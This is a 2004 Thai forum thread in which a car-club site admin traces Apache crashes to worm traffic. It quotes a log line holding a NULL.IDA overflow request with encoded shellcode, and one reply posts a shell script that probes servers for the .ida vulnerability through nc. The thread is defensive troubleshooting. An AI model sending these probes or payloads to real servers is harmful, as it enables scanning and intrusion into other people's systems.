MazdaClub.NET

โอ๊ย....แย่แล้ว

ทำไมมันล่มเช้าล่มเย็นฟ่ะ

อาทิตย์กว่า ๆ มาเนีย server มีปัญหาจริง ๆ เดี๋ยวก็ดังอีกแล้ว (มือถือนะ ม่ะใช่ server)

เอา...วิ่งหาคอมเข้ามาจัดการ สืบเสาะหาสาเหตุมานานก็มิอาจพบได้

และแล้ว..ในที่สุดวันนี้ วันนี้เอง ก็ได้เบาะแสบางอย่างขึ้นมา เนื่องจากพบว่าทุกครั้งที่มีปัญหา เป็นเฉพาะในส่วนของ WebServer (apache) ก็เลยไปเก็บ Log มานั่งอ่านเล่น

หลังนั่งอ่านไปจนเกือบจะหลับ ก็พบต้นต่อที่อาจเป็นตัวการคือ

Server เรามีเพื่อนชาวต่างชาติ ไม่ว่าจะจาก US, HK, UK แวะเวียนเข้ามา ซ้ำหน้า มาก ๆ วันละหลาย ๆ พันเที่ยว แต่หาไม่ได้ต้องการข้อมูลอะไรจากเว็บเราหรอก เพราะมันเข้ามาขอข้อมูลอะไรก็ไม่รู้มันแบบเนี่ย

202.71.215.101 - - [14/Jul/2004:04:56:46 +0700] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%udacf%u77ee%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\t\x90\x90\x90_\xeb\b\x90\x90\x90\xe8\xf5\xff\xff\xff\x8do\xf0\x8d}-\x90\x90\x90\x8b\xf7f\xb8H\x063\xc9f\x8b\xc8\xb4\x99\xfc\xac2\xc4\xaa\xe2\xfa\x14$\xec\x9f\x99\x99e\xaaP(\xb9)\xbdk7_\xdef\x99q\x94\x9d\x99\x99q\x16\x9d\x99\x99q\xd7\x9b\x99\x99\x10\x1c\xda\x9c\x99\x99q\xc8\x9b\x99\x99q\xbd\x9a\x

โดย: เด็กบ้านนอก (phu) วันที่: 14 Jul 2004 - 12:31

ความคิดเห็นที่: 1 / 11 : 001744

โดย: เด็กบ้านนอก (phu)

แค่อยากจะบอกว่า...เรากำลังโดน "กระหน่ำยิง" ครับ

แต่ตอนนี้ ban IP พวกนี้ไปหมดแล้ว คงจะเงียบไปได้สักวันสองวัน เดี๋ยวกันก็คงมาอีก จะทำไงดี(ฟ่ะ)เนีย

วันที่: 14 Jul 04 - 12:34

ความคิดเห็นที่: 2 / 11 : 001748

โดย: TIGER ภูธร

ใจเย็นไว้น้อง
ไม่มีระบบตอบโต้หรือ ถ้าไม่มีก็แบนมันที่ IP ของประเทศนั้นเลยดิให้มันเข้ามาดูเราไม่ได้ทั้งประเทศไปเลย 5555555

หรือเอาปืนของทหารที่ขุดเจอไปยิ่งมันเลย

วันที่: 14 Jul 04 - 12:49

ความคิดเห็นที่: 3 / 11 : 001756

โดย: zexwarior

ไฟวอล เอามะอยู่หรอพี่

แล้วถ้าใช้ระบบแบบ เนทสคริบ ล่ะ คือผมก้อ ไม่ค่อยเข้าใจนักหรอก รู้แต่ระบบมันคือ
หากใครยิงมา มันจะSTRIKEBACK AUTOทันทีอ่ะ

คือ ตอบแบบ งูๆปลาๆอ่ะพี่ ที่เคยเจออ่ะครับ

วันที่: 14 Jul 04 - 13:16

ความคิดเห็นที่: 4 / 11 : 001757

โดย: ไม่อยากบอก

#!/bin/sh
SIZE=1
export SIZE

while [ $SIZE -lt 201 ]; do
BUFF="`perl -e 'print \"x\" x $ENV{SIZE}'`"
echo -e "GET /NULL.ida?$BUFF=X HTTP/1.1\nHost: iluvpaul\n\n" | nc host port
SIZE=`expr $SIZE + 1`
done

Returns:

If response = "Error 0x80040e14 caught while processing query" the
system is patched.

If response = "The IDQ file NULL.ida could not be found." the system
is not patched, and vulnerable.

A Unix/Linux/Apache box always returns the latter, which is OK.

โดนกันถ้วนหน้า ไม่ต้องบ่นหรอก ใจเย็นๆ

วันที่: 14 Jul 04 - 13:18

ความคิดเห็นที่: 5 / 11 : 001768

โดย: sixer

สงสัยมันพยายามหัดอ่านภาษาไทยกันมั๊ง

วันที่: 14 Jul 04 - 14:40

ความคิดเห็นที่: 6 / 11 : 001833

โดย: *~ชั่วมั้งต้องภู~*

ไฟวอลน่ะมี แต่เค้ามาเข้าถูกที่ถูกทางนิครับ ไฟล์วอลล์ทำอะไรม่ะได้หรอก

แต่พวกเล่นมาที่เพียบ อย่างนี้ต้องหา IDS มาลงไว้บ้างซะแล้ว

ฝากไว้ก่อนเถอะมึม....